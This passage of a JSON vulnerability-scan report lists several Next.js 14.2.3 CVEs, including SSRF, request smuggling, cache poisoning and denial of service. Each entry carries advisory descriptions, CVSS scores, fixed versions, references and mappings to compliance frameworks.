"implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.610133333333334, "epss": 0.00519, "epss_percentile": 0.67013, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0207600000000001, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "90791fc1fd7573b4", "ruleId": "CVE-2025-57752", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", "title": "CVE-2025-57752", "description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-57752", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-524" ] }, "raw": { "VulnerabilityID": "CVE-2025-57752", "VendorIDs": [ "GHSA-g5qg-72qw-gw5v" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.31, 15.4.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57752", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a", "Title": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", "Severity": "MEDIUM", "CweIDs": [ "CWE-524" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 6.2 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-57752", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", "https://github.com/vercel/next.js/pull/82114", "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v", "https://nvd.nist.gov/vuln/detail/CVE-2025-57752", "https://vercel.com/changelog/cve-2025-57752", "https://www.cve.org/CVERecord?id=CVE-2025-57752" ], "PublishedDate": "2025-08-29T22:15:31.963Z", "LastModifiedDate": "2025-09-08T16:43:50.33Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.391466666666664, "epss": 0.00109, "epss_percentile": 0.28624, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00436, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "027359ccd596dbb5", "ruleId": "CVE-2025-57822", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js Improper Middleware Redirect Handling Leads to SSRF", "title": "CVE-2025-57822", "description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-57822", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-918" ] }, "raw": { "VulnerabilityID": "CVE-2025-57822", "VendorIDs": [ "GHSA-4342-x723-ch2f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.32, 15.4.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57822", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1", "Title": "Next.js Improper Middleware Redirect Handling Leads to SSRF", "Description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", "Severity": "MEDIUM", "CweIDs": [ "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8", "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f", "https://nvd.nist.gov/vuln/detail/CVE-2025-57822", "https://vercel.com/changelog/cve-2025-57822" ], "PublishedDate": "2025-08-29T22:15:32.143Z", "LastModifiedDate": "2025-09-08T16:41:41.253Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A10:2021" ], "cweTop25_2024": [ { "id": "CWE-918", "rank": 19, "category": "SSRF" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 17.501333333333335, "epss": 0.07815, "epss_percentile": 0.92065, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.3126, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "580a09237cbe3791", "ruleId": "CVE-2025-59471", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next: NextJS Denial of Service in Image Optimizer", "title": "CVE-2025-59471", "description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-59471", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-400" ] }, "raw": { "VulnerabilityID": "CVE-2025-59471", "VendorIDs": [ "GHSA-9g9p-9gw9-jx7f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.10, 16.1.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-59471", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11", "Title": "next: NextJS Denial of Service in Image Optimizer", "Description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-59471", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c", "https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec", "https://github.com/vercel/next.js/releases/tag/v15.5.10", "https://github.com/vercel/next.js/releases/tag/v16.1.5", "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f", "https://nvd.nist.gov/vuln/detail/CVE-2025-59471", "https://www.cve.org/CVERecord?id=CVE-2025-59471" ], "PublishedDate": "2026-01-26T22:15:52.89Z", "LastModifiedDate": "2026-02-13T15:03:20.29Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.347733333333334, "epss": 0.00027, "epss_percentile": 0.07874, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00108, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "04e5c6fdba912e88", "ruleId": "CVE-2026-27980", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", "title": "CVE-2026-27980", "description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", "remediation": "https://avd.aquasec.com/nvd/cve-2026-27980", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-400" ] }, "raw": { "VulnerabilityID": "CVE-2026-27980", "VendorIDs": [ "GHSA-3x4c-7xq6-9pq8" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "16.1.7, 15.5.14", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27980", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f", "Title": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", "V40Score": 6.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27980", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd", "https://github.com/vercel/next.js/releases/tag/v16.1.7", "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8", "https://nvd.nist.gov/vuln/detail/CVE-2026-27980", "https://www.cve.org/CVERecord?id=CVE-2026-27980" ], "PublishedDate": "2026-03-18T01:16:04.957Z", "LastModifiedDate": "2026-03-18T19:52:54.307Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.345066666666668, "epss": 0.00022, "epss_percentile": 0.06354, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00088, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "868dbd425c7fc3b4", "ruleId": "CVE-2026-29057", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: Next.js: HTTP request smuggling in rewrites", "title": "CVE-2026-29057", "description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-29057", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-444" ] }, "raw": { "VulnerabilityID": "CVE-2026-29057", "VendorIDs": [ "GHSA-ggv3-7p47-pfv8" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "16.1.7, 15.5.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29057", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f", "Title": "next.js: Next.js: HTTP request smuggling in rewrites", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", "Severity": "MEDIUM", "CweIDs": [ "CWE-444" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 6.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29057", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6", "https://github.com/vercel/next.js/releases/tag/v15.5.13", "https://github.com/vercel/next.js/releases/tag/v16.1.7", "https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8", "https://nvd.nist.gov/vuln/detail/CVE-2026-29057", "https://www.cve.org/CVERecord?id=CVE-2026-29057" ], "PublishedDate": "2026-03-18T01:16:05.443Z", "LastModifiedDate": "2026-03-18T19:49:19.633Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.349866666666665, "epss": 0.00031, "epss_percentile": 0.0913, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00124, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e4364d984e862d8f", "ruleId": "CVE-2026-44576", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js vulnerable to cache poisoning in React Server Component responses", "title": "CVE-2026-44576", "description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44576", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-436" ] }, "raw": { "VulnerabilityID": "CVE-2026-44576", "VendorIDs": [ "GHSA-wfc6-r584-vfw7" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44576", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb", "Title": "Next.js vulnerable to cache poisoning in React Server Component responses", "Description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-436" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L", "V3Score": 5.4 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7", "https://nvd.nist.gov/vuln/detail/CVE-2026-44576" ], "PublishedDate": "2026-05-13T17:16:23.04Z", "LastModifiedDate": "2026-05-14T13:44:18.27Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" 